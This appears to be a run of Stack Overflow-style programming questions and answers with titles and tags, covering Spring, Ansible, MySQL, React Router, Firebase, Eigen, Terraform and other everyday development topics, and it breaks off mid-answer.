I tried creating a separate schema for the filter attributes and passing it to the filter object, but this did not help. When I changed the schema around I got the following error: `Expected filter.foo to be of type object, instead found type object.`
How can I make Sets work in a nested schema? |
Problems with Sets in Nested Schemas with Dynamoose |
|amazon-dynamodb|dynamoose| |
Use the private property called `_customMaxItems` on `UITabBarController`.
Example:
```swift
final class CustomTabBarController: UITabBarController {
private var customMaxItems: CGFloat {
get {
self.value(forKey: "_customMaxItems") as! CGFloat
}
set {
self.setValue(newValue, forKey: "_customMaxItems")
}
}
override func viewDidLoad() {
super.viewDidLoad()
self.customMaxItems = 10
}
}
```
|
Ettercap pcre_regex or replace not working anymore |
|ettercap| |
I've encountered an issue where SwiftData remains in the /Users/(username)/Library/Containers/MyApp directory even after my app has been deleted (other apps too). This behavior is not what I expected.
Has anyone else faced this issue? Also, I'm wondering whether there is a delay in the deletion process that might account for this. Is there a known time lag before everything is cleared out?
Thanks. |
Persistent SwiftData in 'Library/Containers' Directory After App Uninstallation on macOS |
|swift|macos|swift-data| |
Good day!
My API returns a byte[] variable like this: "...", but Retrofit in my Android application can only read it like this: [...]. How can I change the response?
Entity:
```
@Entity
@Table(name = "book")
public class bookEntity {
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
private long books_id;
private String title;
private String description;
@Column(columnDefinition = "LONGBLOB")
private byte[] cover;
```
Service:
```
public Iterable<bookEntity> findAll()
{
return bookRepository.findAll();
}
```
Controller:
```
@GetMapping
public ResponseEntity getAllBook()
{
return ResponseEntity.ok(bookService.findAll());
}
```
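For context, and this is an assumption about the cause rather than something shown in the question: Spring Boot's default JSON mapper (Jackson) serializes a `byte[]` field as a Base64 string, which is why the client sees `"..."` instead of `[...]`. The encoding itself is reproducible with the JDK alone:

```java
import java.util.Base64;

public class Main {
    public static void main(String[] args) {
        // Jackson renders byte[] fields as Base64 text in the JSON body.
        byte[] cover = {1, 2, 3};
        String asJsonValue = Base64.getEncoder().encodeToString(cover);
        System.out.println(asJsonValue); // prints AQID
    }
}
```

On the Android side, decoding with `Base64.getDecoder().decode(...)` (or a matching converter) would recover the original bytes, rather than changing the server response.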
|
Spring Java API returning byte[] variable with "" |
|spring|spring-boot|spring-data-jpa| |
Also, pay attention to which flavor of your application you are building, since some of them might have set
```
applicationIdSuffix
``` |
I tried using your code within a scene and it works fine. My suspicion is that something is wrong in some other part of the code, probably in regard to the cursor/raycaster.
Anyway, this is a working sample:
<!-- begin snippet: js hide: false console: true babel: false -->
<!-- language: lang-html -->
<html>
<head>
<script src="https://aframe.io/releases/1.5.0/aframe.min.js"></script>
</head>
<body>
<a-scene>
<!-- <a-entity camera look-controls position="0 1.6 0"> <a-cursor></a-cursor>
</a-entity> -->
<a-entity camera look-controls position="0 1.6 0">
<a-entity
cursor
position="0 0 -1"
geometry="primitive: sphere; radius: 0.005"
material="color: #000000; shader: flat; opacity: 0.5"
>
</a-entity>
</a-entity>
<a-box
position="0.5 0.5 -3"
rotation="0 45 0"
color="white"
animation__mouseenter="
property: color;
to: #ff0000;
dur: 1;
startEvents: mouseenter;
"
animation__mouseleave="
property: color;
to: #ffffff;
dur: 1;
startEvents: mouseleave;
"
>
</a-box>
<a-sky color="#ECECEC"></a-sky>
</a-scene>
</body>
</html>
<!-- end snippet -->
|
It’s not possible to take text and translate it into a convenient format |
I'd like to change the permissions on files recursively in a directory tree.
Number of files is in thousands.
I did the following right now on my playbook
```
- name: find all the files inside the wordpress directory
find:
path: /home/vagrant/wordpress
file_type: file
recurse: true
register: files_found
- name: Ensure permissions on folders are in 644
file:
path: "{{item['path']}}"
mode: '0644'
loop: "{{files_found['files']}}"
```
This takes an "infinite" amount of time due to the large number of files in the directory structure.
Is there a better alternative, especially in terms of speed of execution?
I could use the Ansible command module to execute a `find ... -exec` command, but is it really the best alternative?
|
Changing permissions recursively on a directory structure takes too much time. Any alternative solution? |
|ansible| |
null |
This is my query:
```
DROP TABLE `tab`;
CREATE TABLE tab (
`id` INTEGER,
`user` VARCHAR(15),
`userid` INTEGER,
`user_id` INTEGER,
`ipaddr` VARCHAR(7)
);
INSERT INTO tab
(`id`, `user`, `userid`, `user_id`, `ipaddr`)
VALUES
('1', 'Client', '10', '0', '1.1.1.1'),
('2', 'admin1', '1', '0', '2.2.2.2'),
('3', 'Client', '3', '0', '1.1.1.1'),
('4', 'admin2', '5', '0', '3.3.3.3'),
('5', 'Client', '12', '0', '4.4.4.4'),
('6', 'admin1', '1', '0', '2.2.2.2'),
('7', 'Client', '21', '0', '4.4.4.4'),
('8', 'Client', '25', '0', '6.6.6.6'),
('9', 'Sub-Client 20', '35', '0', '4.4.4.4'),
('9', 'Sub-Client 20', '35', '0', '4.4.4.4'),
('9', 'Sub-Client 20', '35', '0', '1.1.1.1'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'user1@gmail.com', '30', '0', '7.7.7.7'),
('8', 'user1@gmail.com', '30', '0', '7.7.7.7');
SELECT
COUNT(ipaddr), `ipaddr`, GROUP_CONCAT(`userid` ORDER BY `userid` DESC ) userid
FROM tab
WHERE `user` = 'Client' OR `user` LIKE 'Sub-Client%' OR `user` LIKE '%@%'
GROUP BY `ipaddr`, `userid`
HAVING COUNT(*) > 0
ORDER By COUNT(ipaddr) DESC
```
This is the result:
```
COUNT(ipaddr) ipaddr userid
2 7.7.7.7 30,30
9 6.6.6.6 25,25,25,25,25,25,25,25,25
1 4.4.4.4 12
1 4.4.4.4 21
2 4.4.4.4 35,35
1 1.1.1.1 3
1 1.1.1.1 10
1 1.1.1.1 35
```
You may see it live: https://dbfiddle.uk/N8PO_qTN
The issue is:
1. It's not sorted by `COUNT(ipaddr)`
1. The `userid` in the output has duplicates (like 30 and 25)
1. One IP is repeated multiple times (like 1.1.1.1)
This is what I expect as the output:
```
COUNT(ipaddr) ipaddr userid
9 6.6.6.6 25
4 4.4.4.4 12, 21, 35
3 1.1.1.1 3, 10, 35
2 7.7.7.7 30
1 4.4.4.4 12
``` |
The Count and GROUP BY and GROUP_CONCAT does not group one field and remove duplicates |
My GUI application is not responsive; I want it to resize according to the window size.
Currently I am using .place(x, y) for placing components.
Example:
label.place(x=100,y=50)
[Not responsive](https://i.stack.imgur.com/c0mvp.png)
I tried looking for a solution and was informed of the .pack() method for placing components; it has 2 params, relative x (relx) and relative y (rely), with respect to its frame/master. I tested it out but my GUI app still isn't responsive. |
Responsive gui customtkinter |
|python|user-interface|tkinter|customtkinter| |
null |
- <kbd>Ctrl</kbd>+<kbd>H</kbd>
- Find what: `\h+$`
- Replace with: `LEAVE EMPTY`
- **TICK** *Wrap around*
- **SELECT** *Regular expression*
- <kbd>Replace all</kbd>
`\h+` stands for 1 or more horizontal spaces. |
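For anyone who wants to reproduce the Notepad++ recipe above in code: Python's `re` module does not support `\h`, so the closest simple equivalent (my assumption, not part of the original recipe) is the character class `[ \t]`:

```python
import re

# \h in Notepad++ (a Boost/PCRE feature) matches horizontal whitespace;
# Python's re has no \h, so [ \t]+ (spaces and tabs) is a close stand-in.
lines = ["keep me   ", "no trailing", "tabs\t\t"]
cleaned = [re.sub(r"[ \t]+$", "", line) for line in lines]
print(cleaned)  # ['keep me', 'no trailing', 'tabs']
```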
[The error that I'm struggling with, with some examples][1]
I have written code for finding prime numbers using the sieve of Eratosthenes algorithm, but it only works for some numbers. For others it seems to run forever (as if it keeps "entering the upto-value infinitely"), while for some numbers it works perfectly. As I only recently started studying C in depth, I can't find what is going wrong. Could someone help me understand what the mistake is, why it happens, and how to prevent it?
Here's the code:
```
#include <stdio.h>
int main()
{
    int n;
    printf("enter number: ");
    scanf("%d", &n);
    int arr[n], i, pr = 2;
    for (i = 0; pr <= n; i++)
    {
        arr[i] = pr;
        pr++;
    }
    int j, k;
    while (arr[k] <= n)
    {
        for (j = 2; j < n; j++)
        {
            for (k = 0; k < n; k++)
            {
                if (arr[k] % j == 0 && arr[k] > j)
                    arr[k] = 0;
            }
        }
    }
    for (i = 0; arr[i] <= n; i++)
    {
        if (arr[i] != 0)
            printf(" %d", arr[i]);
    }
    printf("\n");
    return 0;
}
```
[1]: https://i.stack.imgur.com/r8LC0.png |
My GUI application is not responsive; I want it to resize according to the window size.
Currently I am using .place(x, y) for placing components.
Example:
label.place(x=100, y=50)
[Current components when window is maximized](https://i.stack.imgur.com/c0mvp.png)
I tried looking for a solution and was informed of the .pack() method for placing components; it has 2 params, relative x (relx) and relative y (rely), with respect to its frame/master. I tested it out but my GUI app still isn't responsive. |
This is my code
```
import React, { useState } from 'react';
import { Link } from 'react-router-dom';
import { SidebarData } from './SidebarData';
import { LuMenu } from "react-icons/lu";
import { RxCross2 } from "react-icons/rx";
function Navbar() {
const [sidebar, setSidebar] = useState(false)
const showSidebar = () => setSidebar(!sidebar)
return (
<>
<div className='navbar'>
<Link to="#" className='menu-bars'>
<h1><LuMenu onClick={showSidebar}/> </h1>
</Link>
</div>
<nav className={sidebar ? "nav-menu active" : "nav-menu"}>
<ul className="nav-menu-items" onClick={showSidebar}>
<li className='navbar-toggle'>
{/* <Link to="#" className='menu-bars'>
<RxCross2 />
</Link> */}
</li>
{SidebarData.map((item, index) => {
return (
<li key={index} className={item.cName}>
{/* <Link to={item.path}>
{item.icon}
<span>{item.title}</span>
</Link> */}
</li>
)
})}
</ul>
</nav>
</>
)
}
export default Navbar;
```
```
import React from 'react';
import { AiFillHome } from "react-icons/ai";
import { LuPencilLine } from "react-icons/lu";
export const SidebarData = [
{
title: "Home",
path: "/",
icon: <AiFillHome/>,
cName: "nav-text"
},
{
title: "Entry",
path: "/entry",
icon: <LuPencilLine/>,
cName: "nav-text"
}
]
```
```
import React from 'react';
import { BrowserRouter as Router, Routes, Route } from 'react-router-dom';
import Home from './pages/Home';
import Entry from './pages/Entry';
import Header from './components/Header';
function App() {
return (
<div className="App">
<Header/>
<Router>
<Routes>
<Route path="/" element={<Home />} />
<Route path="/entry" element={<Entry />} />
</Routes>
</Router>
</div>
);
}
export default App;
```
This is the error that I am getting.
```
[Error] TypeError: Right side of assignment cannot be destructured
LinkWithRef (bundle.js:37906)
renderWithHooks (bundle.js:24762)
updateForwardRef (bundle.js:27331)
callCallback (bundle.js:14358)
dispatchEvent
invokeGuardedCallbackDev (bundle.js:14402)
invokeGuardedCallback (bundle.js:14459)
beginWork$1 (bundle.js:34323)
performUnitOfWork (bundle.js:33571)
workLoopSync (bundle.js:33494)
renderRootSync (bundle.js:33467)
performConcurrentWorkOnRoot (bundle.js:32862:93)
workLoop (bundle.js:43931)
flushWork (bundle.js:43909)
performWorkUntilDeadline (bundle.js:44146)
[Error] The above error occurred in the <Link> component:
LinkWithRef@http://localhost:3000/static/js/bundle.js:37893:14
div
Navbar@http://localhost:3000/static/js/bundle.js:249:80
div
div
Header
div
App
Consider adding an error boundary to your tree to customize error handling behavior.
Visit https://reactjs.org/link/error-boundaries to learn more about error boundaries.
logCapturedError (bundle.js:26865)
(anonymous function) (bundle.js:26890)
callCallback (bundle.js:22796)
commitUpdateQueue (bundle.js:22814)
commitLayoutEffectOnFiber (bundle.js:30860)
commitLayoutMountEffects_complete (bundle.js:31953)
commitLayoutEffects_begin (bundle.js:31942)
commitLayoutEffects (bundle.js:31888)
commitRootImpl (bundle.js:33797)
commitRoot (bundle.js:33677)
finishConcurrentRender (bundle.js:32997)
performConcurrentWorkOnRoot (bundle.js:32925)
workLoop (bundle.js:43931)
flushWork (bundle.js:43909)
performWorkUntilDeadline (bundle.js:44146)
```
I observed that when I comment out the `<Link>` part of the code I do not get the error, but otherwise I get the error mentioned above. Am I doing something wrong?
I haven't found my error anywhere, so I am posting this. I tried using useNavigation, but I could not implement it. |
I have a Rails API with a variety of frontend clients.
I’m setting up Google Sign-in/up with OAuth2 (via Google Identity), and am having issues verifying the token that comes from Google - it seems simple with Python/Java/Node.js/PHP ([see their docs](https://developers.google.com/identity/gsi/web/guides/verify-google-id-token)), but with Ruby it is proving difficult.
For context, my basic flow is:
1) Authentication button gets clicked on the client.
2) User completes authentication with Google, who redirects the request back to my Rails API, with the user’s email and a token.
3) Rails API searches for existing user with that email; if they exist, we authenticate them. If not, we create a new user with that email and then authenticate them.
I’m trying to verify the token in order to make sure that the request isn’t fake, i.e. someone/something pretending to be Google.
I’ve tried hitting the endpoint directly using the `jti` field that comes back in the `credential` response from Google, i.e. https://oauth2.googleapis.com/tokeninfo?id_token=my_token_here, but it says it is invalid each time, even though I literally just received it from Google each time that I test it.
When I go to [Google’s docs for verifying the token](https://developers.google.com/identity/gsi/web/guides/verify-google-id-token), the example for Python is extremely clear - but since there is no Ruby client, it leads me to the link “[Use one of the Google API Client Libraries](https://developers.google.com/api-client-library)”, so I click on the Ruby one which [takes me here](https://github.com/googleapis/google-api-ruby-client), which then tells me that I should use [the more modern clients](https://github.com/googleapis/google-cloud-ruby). So then I bounce between those last two links, and within those GitHub repositories I’ve been unable to find anything useful.
I tried using [this `googleauth` gem](https://github.com/googleapis/google-auth-library-ruby), but the only useful methods seem to be `Google::Auth::IDTokens.verify_oidc(access_token)` as well as `Google::Auth::IDTokens.verify_iap(access_token)`, but both of those return saying it is an invalid token, and I’m not using OIDC (open ID connect) nor IAP (Identity-aware Proxy), as far as I know, so it makes sense that it returns as invalid.
Any help would be much appreciated - I’m sure other folks have had to verify tokens in a similar manner before using Ruby.
Best,
Michael |
The issue with your code is that your getGrade method always returns the grade based on the first mark in the actualMark array and doesn't consider other marks. This is because you have a return statement inside the loop, and it exits the loop and returns the grade based on the first mark it encounters.
To fix this issue in another way, you could iterate through all the marks, calculate the grade for each mark, and store the grades in an array. Then, you can return the array of grades or use it as needed.
```
public String[] getGrades() {
    String[] grades = new String[5]; // Assuming you have 5 marks
    for (int i = 0; i < 5; ++i) {
        if (actualMark[i] >= 85) {
            grades[i] = "A";
        } else if (actualMark[i] >= 75) {
            grades[i] = "A-";
        } else if (actualMark[i] >= 70) {
            grades[i] = "B+";
        } else if (actualMark[i] >= 65) {
            grades[i] = "B";
        } else if (actualMark[i] >= 60) {
            grades[i] = "B-";
        } else if (actualMark[i] >= 55) {
            grades[i] = "C+";
        } else if (actualMark[i] >= 50) {
            grades[i] = "C";
        } else if (actualMark[i] >= 45) {
            grades[i] = "D";
        } else if (actualMark[i] >= 35) {
            grades[i] = "E";
        } else if (actualMark[i] < 35) {
            grades[i] = "F";
        }
    }
    return grades;
}
```
And for your main:
```
for (int i = 0; i < 5; i++) {
    System.out.println("The course code is " + b.courseCode[i]);
    System.out.println("The course name is " + b.courseName[i]);
    System.out.println("The session is " + b.session[i]);
    System.out.println("The semester is " + b.semester[i]);
    System.out.println("The mark is " + b.actualMark[i]);
    System.out.println("The grade is " + b.getGrades()[i]);
}
```
|
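The if/else ladder above can also be written as a small data-driven lookup. The cutoffs and letters below are copied from the grading scale in the answer; the class and method names are illustrative, not from the original code:

```java
// Data-driven alternative to the if/else chain: walk the cutoff table and
// return the first letter whose threshold the mark meets.
public class GradeTable {
    private static final int[] CUTOFFS = {85, 75, 70, 65, 60, 55, 50, 45, 35};
    private static final String[] LETTERS = {"A", "A-", "B+", "B", "B-", "C+", "C", "D", "E"};

    public static String gradeFor(int mark) {
        for (int i = 0; i < CUTOFFS.length; i++) {
            if (mark >= CUTOFFS[i]) {
                return LETTERS[i];
            }
        }
        return "F"; // anything below 35
    }

    public static void main(String[] args) {
        System.out.println(gradeFor(90)); // A
        System.out.println(gradeFor(72)); // B+
        System.out.println(gradeFor(20)); // F
    }
}
```

Keeping the scale in two parallel arrays means changing a cutoff touches one number instead of an entire branch.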
I'm coding a program to find perfect numbers. I have found some interesting properties and worked on my code to generate perfect numbers. This is my idea:
```
static List<int> TesterPerfectNumber(int upperbound)
{
    List<int> nums = new List<int>();
    for (int i = 2; i < upperbound; i++)
    {
        if (IsPrime(i))
        {
            int mersenneNumber = (int)Math.Pow(2, i) - 1;
            if (IsPrime(mersenneNumber))
            {
                int perfectNumber = (int)Math.Pow(2, i - 1) * mersenneNumber;
                nums.Add(perfectNumber);
            }
        }
    }
    return nums;
}
```
The output is correct for the first 4 perfect numbers; however, I don't know why it fails on the 5th and outputs negative numbers (with `foreach (int j in TesterPerfectNumber(20)){Console.WriteLine(j);}`):
[](https://i.stack.imgur.com/WWL4d.png)
I suspect the bug is in my algorithm, but the alternative form of finding perfect numbers is (2^(p-1))*(2^p - 1) with p and 2^p - 1 being primes. I have also found another way to find perfect numbers, but it consumes more storage and time: basically looping over positive numbers, finding the factors of each, and adding them up, up to the upperbound limit.
Can you help me debug the code, or come up with another reasonable solution? Or are there limits to `List<T>` or `int` that I haven't taken into consideration? Please help me, and thanks. |
Errors in outputing elements in a List<int> |
I got it working with slight modification of what @LãNgọcHải suggested:
```
const volumeResetHandler = async () => {
inputRef.current.value = 0;
(inputRef.current as any).addEventListener('change', volumeChangeHandler);
(inputRef.current as any).dispatchEvent(new Event('change', { bubbles: true }));
}
```
Thanks a lot @LãNgọcHải.
One small remaining issue: I had logic based on `event.isTrusted == true`, which is now `false` for any explicitly triggered event, so I will have to find some workaround for that. I guess that's what `bubbles` is for, isn't it @LãNgọcHải? |
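As a follow-up on the `isTrusted` point in the answer above: any event created and dispatched from script reports `isTrusted === false`, and `bubbles` only controls propagation, not trust. A common workaround (my assumption, not from the original code) is to tag programmatic events with your own marker property:

```javascript
// Runs in Node 15+ (which ships EventTarget/Event) as well as in the browser.
const target = new EventTarget();

let seen = null;
target.addEventListener("change", (event) => {
  seen = {
    trusted: event.isTrusted,                  // always false for script-dispatched events
    programmatic: event.programmatic === true, // our own marker flag
  };
});

const evt = new Event("change", { bubbles: true });
evt.programmatic = true; // mark this as an explicitly triggered event
target.dispatchEvent(evt);

console.log(seen); // { trusted: false, programmatic: true }
```

The listener can then branch on the marker instead of `isTrusted`.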
I want to perform a bulk insert into MariaDB using JdbcTemplate in Spring, but even when I append `?rewriteBatchedStatements=true` to the JDBC URL, the inserts are still executed one by one.
My code currently produces this:
```
INSERT INTO tbl (1, 2, ...) VALUES (val1, val2, ...)
INSERT INTO tbl (1, 2, ...) VALUES (val1, val2, ...)
INSERT INTO tbl (1, 2, ...) VALUES (val1, val2, ...)
```
but I want this:
```
INSERT INTO tbl (1, 2, ...) VALUES (val1, val2, ...), (val1, val2, ...), ...
```
Is there any other way? What am I missing?
This is my code:
```
spring.datasource.jdbc-url=jdbc:log4jdbc:mariadb://ip/db?rewriteBatchedStatements=true&profileSQL=true&logger=Slf4JLogger&maxQuerySizeToLog=999999
public void insertBatch(List<object> objectList) {
String sql = "";
sql += "INSERT INTO TBL_NAME" +
" (columns1, 2...) " +
"VALUES (?, ?...) ";
jdbcDBTemplate.batchUpdate(sql, new BatchPreparedStatementSetter() {
@Override
public void setValues(PreparedStatement ps, int i) throws SQLException {
object object = objectList.get(i);
ps.setInt(1, object.getCol1());
ps.setInt(2, object.getCol2());
}
@Override
public int getBatchSize() {
return tblInfoDetailList.size();
}
});
```
It's too slow. Please help me.
|
How can I perform bulk insert into MariaDB using JdbcTemplate in Spring? |
|spring-boot|mariadb|jdbctemplate| |
null |
I am working on a .NET Core project where I am using the repository pattern and using the repositories inside a mediator handler.
I have a method inside a repository which returns multiple records from the database:
```
public List<T> GetAll(List<Expression<Func<T, object>>>? includes = null)
{
IQueryable<T> query = _dbSet.AsQueryable();
if (includes != null)
{
query = includes.Aggregate(query, (current, include) => current.Include(include));
}
return query.AsNoTracking().ToList();
}
```
I am providing the includes in the handler like below:
```
public async Task<List<Office>> Handle(Office request, CancellationToken cancellationToken)
{
var includes = new List<Expression<Func<Office, object>>>
{
c => c.OfficeAddresses,
c => c.OfficeDepartments.Select(d => d.Department).Select(cc => cc.Phones),
};
return await _repository.GetAll(includes: includes);
}
```
I am getting this error: `The expression 'c.OfficeDepartments.AsQueryable().Select(x => x.Department)' is invalid inside an 'Include' operation, since it does not represent a property access: 't => t.MyProperty'. To target navigations declared on derived types, use casting ('t => ((Derived)t).MyProperty') or the 'as' operator ('t => (t as Derived).MyProperty'). Collection navigation access can be filtered by composing Where, OrderBy(Descending), ThenBy(Descending), Skip or Take operations`
|
Verifying Google Identity OAuth2 token with Ruby |
|ruby-on-rails|ruby|oauth-2.0|google-oauth| |
In a Python dictionary, items with the same key simply get overwritten by later items, so in the end your dict could only have one item with the key "A".
My suggestion is to get all of it into a single flat sequence and simply parse that, so one item is a key, the next is its value, the next is a key, and so on.
You can do that simply by replacing ":" with ",", as I did in the following code:
```
array = ("A", "Red", "A", "Blue", "A", "Green", "B", "Yellow", "C", "Black", "B", "smth")
dictionary = {}
# Walk the flat sequence pairwise: even positions are keys, odd positions are values.
for item_key, item in zip(array[::2], array[1::2]):
    if item_key in dictionary:
        if isinstance(dictionary[item_key], list):
            dictionary[item_key].append(item)
        else:
            dictionary[item_key] = [dictionary[item_key], item]
    else:
        dictionary[item_key] = item
```
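If every value may as well be a list from the start, the same pairing idea can be written without the list/scalar branching by using `collections.defaultdict` (a variation on the answer above, not part of the original question):

```python
from collections import defaultdict

# Pair up keys (even positions) with values (odd positions) and collect
# every value into a list keyed by its label.
array = ("A", "Red", "A", "Blue", "A", "Green", "B", "Yellow", "C", "Black", "B", "smth")

grouped = defaultdict(list)
for key, value in zip(array[::2], array[1::2]):
    grouped[key].append(value)

print(dict(grouped))
# {'A': ['Red', 'Blue', 'Green'], 'B': ['Yellow', 'smth'], 'C': ['Black']}
```

The trade-off is that single-valued keys come back as one-element lists instead of bare values.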
|
error CS0029: Cannot implicitly convert type 'System.Threading.Tasks.Task<Firebase.Auth.AuthResult>' to 'Firebase.Auth.FirebaseUser'
```csharp
public void OnClickSignIn()
{
FirebaseAuth auth = FirebaseAuth.DefaultInstance;
Debug.Log("Clicked SignIn");
string emailText = emailSignin.GetComponent<TMP_InputField>().text;
string passwordText = passwordSignin.GetComponent<TMP_InputField>().text;
auth.SignInWithEmailAndPasswordAsync(emailText,
passwordText).ContinueWithOnMainThread(task =>
{
if (task.IsCanceled)
{
Debug.Log("SignIn Canceled");
Debug.LogError("SignInWithEmailAndPasswordAsync was canceled.");
return;
}
if (task.IsFaulted)
{
Debug.Log("SignIn Failed");
Debug.LogError("SignInWithEmailAndPasswordAsync encountered an error: " + task.Exception);
signinFailNotification.OpenNotification();
return;
}
FirebaseUser newUser = task;
if (newUser != null)
{
signinSuccessNotification.OpenNotification();
Debug.LogFormat("User signed in successfully: {0} ({1})",
newUser.DisplayName, newUser.UserId);
}
});
}
public void OnClickSignUp()
{
FirebaseAuth auth = FirebaseAuth.DefaultInstance;
Debug.Log("Clicked SignUp");
string emailText = emailSignup.GetComponent<TMP_InputField>().text;
string passwordText = passwordSignup.GetComponent<TMP_InputField>().text;
auth.CreateUserWithEmailAndPasswordAsync(emailText,
passwordText)
.ContinueWithOnMainThread(task =>
{
if (task.IsCanceled)
{
Debug.Log("Signup Canceled");
Debug.LogError("CreateUserWithEmailAndPasswordAsync was canceled.");
return;
}
if (task.IsFaulted)
{
Debug.Log("Signup Failed");
Debug.LogError("CreateUserWithEmailAndPasswordAsync encountered an error: " + task.Exception);
signupFailNotification.OpenNotification();
return;
}
// Firebase user has been created.
Debug.Log("Signup Successful");
FirebaseUser newUser = task;
if (newUser != null)
{
writeNewUser(newUser.UserId,newUser.Email);
signupSuccessNotification.OpenNotification();
Debug.LogFormat("Firebase user created successfully: {0} ({1})",
newUser.DisplayName, newUser.UserId);
}
});
``` |
|c#|list| |
null |
My problem is solved. I made a mistake and forgot to declare the variables as global. Now I simply send the weights vector and the delayed-signal vector to the function.
___________
Thanks to all!! |
You can use a pretty simple FTP server app for Android (WiFi FTP); I use the PRO version. On my Android TV I use Kodi, which has an FTP client, and everything works like a charm. It's a very good combination. Try it ;) |
Am I doing something wrong or is this a server problem? This hangs up the browser (Safari and Firefox under MACOS):
```
<!DOCTYPE html>
<HTML>
<BODY>
<?php
$qq = str_repeat("X",409998);
echo $qq;
?>
</BODY>
</HTML>
```
Running on Google's AppEngine, standard environment, PHP 8.2. If I shorten the string, it works fine. While the problem is consistent, if I play with the length of the string, I can get it to work with some longer strings. |
Why does the server hang for GAE php8.2 standard environment when echoing a long string? |
|php|macos|google-app-engine|firefox|safari| |
I have a vector of indices that I'd like to select by: in each column a different row will be selected. The output should be one vector of selected values whose length equals the number of columns, but without using a slow loop. For example:
```
set.seed(123)
(M <- matrix(rnorm(25), 5))

            [,1]       [,2]       [,3]       [,4]       [,5]
[1,] -0.56047565  1.7150650  1.2240818  1.7869131 -1.0678237
[2,] -0.23017749  0.4609162  0.3598138  0.4978505 -0.2179749
[3,]  1.55870831 -1.2650612  0.4007715 -1.9666172 -1.0260044
[4,]  0.07050839 -0.6868529  0.1106827  0.7013559 -0.7288912
[5,]  0.12928774 -0.4456620 -0.5558411 -0.4727914 -0.6250393

indíces <- c(2, 3, 1, 4, 4)
vect <- c()
for(i in 1:5) {
  vect <- c(vect, M[indíces[i], i])
}
vect

[1] -0.2301775 -1.2650612  1.2240818  0.7013559 -0.7288912
```
I have a larger data set, so a for loop isn't ideal, but I couldn't think of or find anything better. |
Select various cells according to different combinations of columns and rows |
|r| |
I have been trying to code collision for a school project. However, I quickly noticed that when I draw a bitmap using the `canvas.DrawBitmap(currentImage, position.X, position.Y, paint)` function, it does not match the size of the radius: the image appears bigger than the actual circle. This is not an issue when I use the `canvas.DrawCircle(position.X, position.Y, size.Width / 2, new Paint() { Color = Color.Black })` function, as it is scaled properly. How do I create a bitmap that is scaled correctly to the actual circle?
Relevant code:
```
public Sprite(float x, float y, float size, Context context) : base(x, y)
{
    int id = (int)typeof(Resource.Drawable).GetField(General.IMG_BALL).GetValue(null);
    image = BitmapFactory.DecodeResource(context.Resources, id);
    this.size = new SizeF(size, size);

    paint = new Paint(PaintFlags.AntiAlias);
    paint.AntiAlias = false;
    paint.FilterBitmap = false;
    paint.Dither = true;
    paint.SetStyle(Paint.Style.Fill);
}

public void DisplayImage(Canvas c)
{
    Matrix matrix = new Matrix();
    matrix.PostTranslate(position.X, position.Y);
    matrix.PreScale(size.Width, size.Height);
    c.DrawBitmap(image, matrix, paint);
}
```
|
I am trying to extend Eigen's matrix classes to work with my own library's using their #define. Eigen is located in `/usr/local/include`. My project is in a separate folder. I followed the guide specified [in their documentation](https://eigen.tuxfamily.org/dox/TopicCustomizing_Plugins.html).
Here is where I defined the relative paths for my extensions in a file called `SparseMatrix`.
```
#define EIGEN_MATRIXBASE_PLUGIN "src/Eigen_Extension/Matrix_Extension.hpp"
#define EIGEN_SPARSEMATRIX_PLUGIN "src/Eigen_Extension/Sparse_Matrix_Extension.hpp"
#include <Eigen/Core>
#include <Eigen/Sparse>
```
When I try to compile with `g++ test.cpp`, I get the error
```
SparseMatrix:59:33: fatal error: src/Eigen_Extension/Matrix_Extension.hpp: No such file or directory
59 | #define EIGEN_MATRIXBASE_PLUGIN "src/Eigen_Extension/Matrix_Extension.hpp"
| ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
```
Despite the error showing my file, I know gcc is trying to include `src/Eigen_Extension/Matrix_Extension.hpp` in Eigen's .h file. This does compile if I use an absolute path.
My question boils down to: how can I make this work with a relative path, preferably without build systems or extra compiler arguments?
I tried creating a convoluted define structure using `__FILE__`.
Matrix_Extension.hpp:
```
#include "../../SparseMatrix"
#ifdef EIGEN_MATRIXBASE_PLUGIN
// source code
#else
#EIGEN_MATRIXBASE_PLUGIN __FILE__ //to get absolute path of extension file
#endif
```
SparseMatrix:
```
#include src/Eigen_Extension/Matrix_Extension.hpp
#include <Eigen/Core>
```
Unfortunately, this ran into issues with my code not having Eigen included, despite the define guards.
How can I include a file using Eigen's plugin include? |
|c++|c++17|eigen| |
null |
# Option #1
We can do that with a [lifecycle precondition][1] in a null_resource
A couple of things before we dive into the code:
- Your code has two `sc1_default` variables; I'm assuming that the second one was a typo and that what we need there is `sc2_default`.
- For additional validation, use `type` in the variables; it's good practice, it makes the code more readable, and if someone accidentally passes the wrong type the code fails gracefully.

See the sample code below:
``` lang-hcl
variable "sc1_default" {
type = bool
default = false
}
variable "sc2_default" {
type = bool
default = false
}
variable "sc3_default" {
type = bool
default = true
}
variable "sc4_default" {
type = bool
default = true
}
resource "null_resource" "validation" {
lifecycle {
precondition {
condition = (
(var.sc1_default ? 1 : 0) +
(var.sc2_default ? 1 : 0) +
(var.sc3_default ? 1 : 0) +
(var.sc4_default ? 1 : 0)
) < 2
error_message = "Only one sc can be true"
}
}
}
```
You can see I set the `sc3_default` and `sc4_default` both to true just to trigger the error ...
The condition is the core of this validation: we are just adding up the true values with the help of the shorthand if syntax `(var.sc_default ? 1 : 0)`, and the total should be less than two. I'm assuming that all false is OK, but if not you can change the logic to check that exactly one is true.
A terraform plan on that code will error out with the following message:
``` lang-txt
Planning failed. Terraform encountered an error while generating this plan.
╷
│ Error: Resource precondition failed
│
│ on main.tf line 24, in resource "null_resource" "validation":
│ 24: condition = (
│ 25: (var.sc1_default ? 1 : 0) +
│ 26: (var.sc2_default ? 1 : 0) +
│ 27: (var.sc3_default ? 1 : 0) +
│ 28: (var.sc4_default ? 1 : 0)
│ 29: ) < 2
│ ├────────────────
│ │ var.sc1_default is false
│ │ var.sc2_default is false
│ │ var.sc3_default is true
│ │ var.sc4_default is true
│
│ Only one sc can be true
```
____
# Option #2
If you can change the input variables, we could reduce them to just one with a `list(bool)`; the code will be smaller and the validation will sit right on the variable:
``` lang-hcl
variable "sc_default" {
type = list(bool)
